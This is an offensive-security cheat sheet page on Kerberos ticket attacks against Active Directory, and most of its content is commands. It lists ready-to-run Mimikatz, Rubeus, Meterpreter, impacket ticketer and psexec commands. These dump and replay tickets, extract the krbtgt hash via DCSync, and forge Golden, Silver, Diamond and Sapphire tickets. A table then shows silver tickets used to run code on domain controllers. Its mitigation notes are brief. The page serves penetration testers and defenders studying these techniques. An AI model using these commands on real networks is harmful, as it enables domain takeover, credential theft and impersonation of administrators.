kerberos-tickets.md (11272B)
1 --- 2 title: "Kerberos - Tickets" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/kerberos-tickets.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/kerberos-tickets.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Kerberos - Tickets 12 13 Tickets are used to grant access to network resources. A ticket is a data structure that contains information about the user's identity, the network service or resource being accessed, and the permissions or privileges associated with that resource. Kerberos tickets have a limited lifetime and expire after a set period of time, typically 8 to 12 hours. 14 15 There are two types of tickets in Kerberos: 16 17 * **Ticket Granting Ticket** (TGT): The TGT is obtained by the user during the initial authentication process. It is used to request additional service tickets without requiring the user to re-enter their credentials. The TGT contains the user's identity, a timestamp, and an encryption of the user's secret key. 18 19 * **Service Ticket** (ST): The service ticket is used to access a specific network service or resource. The user presents the service ticket to the service or resource, which then uses the ticket to authenticate the user and grant access to the requested resource. The service ticket contains the user's identity, a timestamp, and an encryption of the service's secret key. 20 21 ## Dump Kerberos Tickets 22 23 * Mimikatz: `sekurlsa::tickets /export` 24 * Rubeus 25 26 ```ps1 27 # List available tickets 28 Rubeus.exe triage 29 30 # Dump one ticket, the output is in Kirbi format 31 Rubeus.exe dump /luid:0x12d1f7 32 ``` 33 34 ## Replay Kerberos Tickets 35 36 * Mimikatz: `mimikatz.exe "kerberos::ptc C:\temp\TGT_Administrator@lab.local.ccache"` 37 * netexec: `KRB5CCNAME=/tmp/administrator.ccache netexec smb 10.10.10 -u user --use-kcache` 38 39 ## Convert Kerberos Tickets 40 41 In the Kerberos authentication protocol, ccache and kirbi are two types of Kerberos credential caches that are used to store Kerberos tickets. 42 43 * A credential cache, or `"ccache"` is a temporary storage area for Kerberos tickets that are obtained during the authentication process. The ccache contains the user's authentication credentials and is used to access network resources without having to re-enter the user's credentials for each request. 44 45 * The Kerberos Integrated Windows Authentication (KIWA) protocol used by Microsoft Windows systems also makes use of a credential cache called a `"kirbi"` cache. The kirbi cache is similar to the ccache used by standard Kerberos implementations, but with some differences in the way it is structured and managed. 46 47 While both caches serve the same basic purpose of storing Kerberos tickets to enable efficient access to network resources, they differ in format and structure. You can convert them easily using: 48 49 * kekeo: `misc::convert ccache ticket.kirbi` 50 * impacket: `impacket-ticketConverter SRV01.kirbi SRV01.ccache` 51 52 ## Pass-the-Ticket Golden Tickets 53 54 A Golden Ticket is a forged Kerberos Ticket Granting Ticket (TGT) that allows an attacker to impersonate any user — including Domain Admins — on a compromised Active Directory domain. 55 56 **Requirements**: 57 58 | Requirement | Description | 59 | ----------------- | ------------------------------------------------------- | 60 | Domain name | corp.local | 61 | Domain SID | S-1-5-21-1234567890-2345678901-3456789012 | 62 | KRBTGT NTLM hash | The NTLM hash of the KRBTGT account | 63 | Username | Administrator | 64 | (Optional) Groups | Add group SIDs for elevated access (e.g., Domain Admin) | 65 66 As a result of `CVE-2021-42287` mitigations, the ticket cannot use a non-existent account name. 67 68 > The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt NT hash must be used. 69 70 ### Golden Ticket Creation 71 72 * Using **Ticketer** 73 74 ```powershell 75 python3 ticketer.py -nthash <KRBTGT_NTLM_HASH> \ 76 -domain-sid S-1-5-21-1234567890-2345678901-3456789012 \ 77 -domain corp.local Administrator 78 79 python3 ticketer.py -nthash <KRBTGT_NTLM_HASH> \ 80 -domain-sid S-1-5-21-1234567890-2345678901-3456789012 \ 81 -domain corp.local \ 82 -user-id 500 \ 83 -extra-sid S-1-5-21-1234567890-2345678901-3456789012-512 \ 84 Administrator 85 ``` 86 87 * Using **Mimikatz** 88 89 ```powershell 90 # Get info - Mimikatz 91 lsadump::lsa /inject /name:krbtgt 92 lsadump::lsa /patch 93 lsadump::trust /patch 94 lsadump::dcsync /user:krbtgt 95 96 # Forge a Golden ticket - Mimikatz 97 kerberos::purge 98 kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt 99 kerberos::tgt 100 ``` 101 102 * Using **Meterpreter** 103 104 ```powershell 105 # Get info - Meterpreter(kiwi) 106 dcsync_ntlm krbtgt 107 dcsync krbtgt 108 109 # Forge a Golden ticket - Meterpreter 110 load kiwi 111 golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck> 112 golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck 113 kerberos_ticket_purge 114 kerberos_ticket_use /root/Downloads/pentestlabuser.tck 115 kerberos_ticket_list 116 ``` 117 118 Golden tickets with "Enterprise admins" SID can be used cross forest boundaries. 119 120 **Mitigations**: 121 122 * Hard to detect because they are legit TGT tickets 123 * Mimikatz generate a golden ticket with a life-span of 10 years 124 125 ## Pass-the-Ticket Silver Tickets 126 127 Forging a Service Ticket (ST) require machine account password (key) or NT hash of the service account. 128 129 ```powershell 130 # Create a ticket for the service 131 mimikatz $ kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE 132 133 # Examples 134 mimikatz $ /kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt 135 mimikatz $ kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park 136 137 # Then use the same steps as a Golden ticket 138 mimikatz $ misc::convert ccache ticket.kirbi 139 140 root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache 141 root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 142 ``` 143 144 Interesting services to target with a silver ticket : 145 146 | Service Type | Service Silver Tickets | Attack | 147 | ------------------------------------------ | ---------------------- | ---------------------------------------------------------------------------------------------------------------- | 148 | WMI | HOST + RPCSS | `wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"` | 149 | PowerShell Remoting | CIFS + HTTP + (wsman?) | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` | 150 | WinRM | HTTP + wsman | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` | 151 | Scheduled Tasks | HOST | `schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"` | 152 | Windows File Share (CIFS) | CIFS | `dir \\dc01\c$` | 153 | LDAP operations including Mimikatz DCSync | LDAP | `lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt` | 154 | Windows Remote Server Administration Tools | RPCSS + LDAP + CIFS | / | 155 156 Mitigations: 157 158 * Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket. 159 160 ## Pass-the-Ticket Diamond Tickets 161 162 > Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key 163 164 Requirements: 165 166 * krbtgt NT Hash 167 * krbtgt AES key 168 169 ```ps1 170 ticketer.py -request -domain 'lab.local' -user 'domain_user' -password 'password' -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser' 171 172 Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:USER_ID /groups:GROUP_IDS 173 ``` 174 175 ## Pass-the-Ticket Sapphire Tickets 176 177 > Requesting the target user's PAC with `S4U2self+U2U` exchange during TGS-REQ(P) (PKINIT). 178 179 The goal is to mimic the PAC field as close as possible to a legitimate one. 180 181 Requirements: 182 183 * [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411) 184 * krbtgt AES key 185 186 ```ps1 187 # baduser argument will be ignored 188 ticketer.py -request -impersonate 'domain_adm' -domain 'lab.local' -user 'domain_user' -password 'password' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' 'baduser' 189 ``` 190 191 ## References 192 193 * [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/) 194 * [How Attackers Use Kerberos Silver Tickets to Exploit Systems - Sean Metcalf](https://adsecurity.org/?p=2011) 195 * [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/) 196 * [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond) 197 * [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/) 198 * [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire) 199 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 1](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/) 200 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 2](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/) 201 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 3](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/) 202 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 4](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/) 203 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/) 204 * [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html) 205 * [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)